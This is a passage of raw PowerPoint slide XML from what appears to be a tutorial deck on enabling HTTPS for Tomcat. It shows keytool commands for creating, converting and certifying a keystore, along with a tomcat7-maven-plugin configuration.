        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keytool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>genkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>noprompt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -alias tomcat-localhost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localhost-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rsa.jks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> test@123 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>storepass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> test@123 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "CN=tomcat-cert, OU=Dev, O=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtusa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, L=Chennai, ST=TN, C=IN"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enhance the certificate</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keytool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>importkeystore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>srckeystore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> localhost-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rsa.jks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>destkeystore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> banking-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rsa.jks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deststoretype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pkcs12  -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>noprompt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -alias tomcat-localhost -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keyalg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> RSA -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> test@123 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>storepass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> test@123 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "CN=tomcat-cert, OU=Dev, O=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtusa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, L=Chennai, ST=TN, C=IN"</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-3429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8986937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How to Obtain a Signature for an SSL Certificate</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Generate</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keytool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>certreq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -v -alias tomcat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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keystore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keytool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>certreq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -v -alias tomcat-localhost -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keyalg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> RSA -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keystore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> banking-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rsa.jks</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Print certificate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keytool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printcert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>certificate-reply-file</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keytool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -v -import -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trustcacerts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keystore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keystore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-location -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file certificate-reply-file -alias </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tomcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keytool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -v -list -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keystore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keystore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-location</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13034375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How to configure Maven Tomcat Plugin to use HTTPS (SSL/TLS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1)Creating a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Keystore</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(2)Configuring tomcat7-maven-plugin to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;plugin&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>groupId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>org.apache.tomcat.maven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>groupId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>artifactId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;tomcat7-maven-plugin&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>artifactId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     &lt;version&gt;2.2&lt;/version&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     &lt;configuration&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         &lt;path&gt;/&lt;/path&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>httpsPort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;8443&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>httpsPort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keystoreFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;C:\my-cert-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\localhost-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rsa.jks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keystoreFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
